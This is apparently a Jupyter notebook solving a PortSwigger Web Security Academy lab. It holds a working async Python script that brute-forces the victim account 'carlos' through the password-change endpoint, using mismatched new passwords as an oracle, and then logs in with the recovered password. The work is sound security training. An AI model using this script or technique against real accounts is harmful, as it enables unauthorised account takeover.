# Other - Password Brute-Force via Password Change
[See lab here](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change)

Me: `wiener:peter`\
Target: `carlos`

In [1]:
import requests
import asyncio
import aiohttp
import tqdm.notebook as tq

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

from load_un_pw import get_un_pw

In [2]:
URL = "https://ac811f6c1f957141c00ac648003a0092.web-security-academy.net/"

_, passwords = get_un_pw()

target_uname = "carlos"
my_data = {"username" : "wiener", "password" : "peter"}

#Log in as myself to grab a valid session cookie
s = requests.session()
r = s.post(URL + "login", data=my_data)
session_cookie = s.cookies.get_dict()

#Lets just try to submit the "change password" request over and over with carlos' username,
#iterating through all passwordsb

#https://acd11f521f5e2f3ac0d53bee00d3004c.web-security-academy.net/my-account/change-password

async def reset_pw(session, old_pw):
    async with session.post(
        URL + "my-account/change-password", 
        data = {"username" : target_uname, 
                "current-password" : old_pw,
                "new-password-1" : "a", 
                "new-password-2" : "b"}
        ) as response:
        return [old_pw, await response.text()]
    
async def brute_force_pw_change():
    async with aiohttp.ClientSession(cookies = session_cookie) as session:
        tasks = [reset_pw(session, x) for x in passwords]
        
        return [await f for f in tq.tqdm(asyncio.as_completed(tasks), total=len(tasks))]
        
result = asyncio.run(brute_force_pw_change())

  0%|          | 0/100 [00:00<?, ?it/s]

In [3]:
target_pw = [x[0] for x in result if "New passwords do not match" in x[1]][0]
target_pw

'thomas'

Ok so now we have the password. Let's log in to finish the lab

In [4]:
r = requests.post(URL + "login", data = {"username" : target_uname, "password" : target_pw})
r

<Response [200]>